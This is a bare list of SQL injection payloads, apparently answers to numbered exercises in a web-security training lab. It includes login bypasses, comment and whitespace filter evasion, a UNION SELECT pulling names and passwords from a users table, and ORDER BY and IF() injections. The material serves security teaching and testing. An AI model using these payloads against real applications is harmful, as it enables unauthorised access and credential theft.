1:
root' or '1'='1
root+++
root' and '1'='1' %23
root'%23

2:
root'or'1'='1
root'%09or%09'1'='1
root'/**/or/**/'1'='1

3:
root'or'1'='1
root'/**/or/**/'1'='1

6:
1 or 1=1
1 or 1=1 %23 123
2 union select name,passwd,3,4,5 from users %23 1

8:
name` %23
name` DESC %23

9:
IF(1, name, age)
IF(0, name, age)

1:
' or 1=1 #
' or 1=1 -- 

2:
' or 1=1 limit 1#

3:
\
or 1=1 -- 

4:
id=5 or 1=1
username=hacker or 1=1

5:
3 union select * from users
3 union (select * from users where id =1 or 1=1)

6:
id order by username










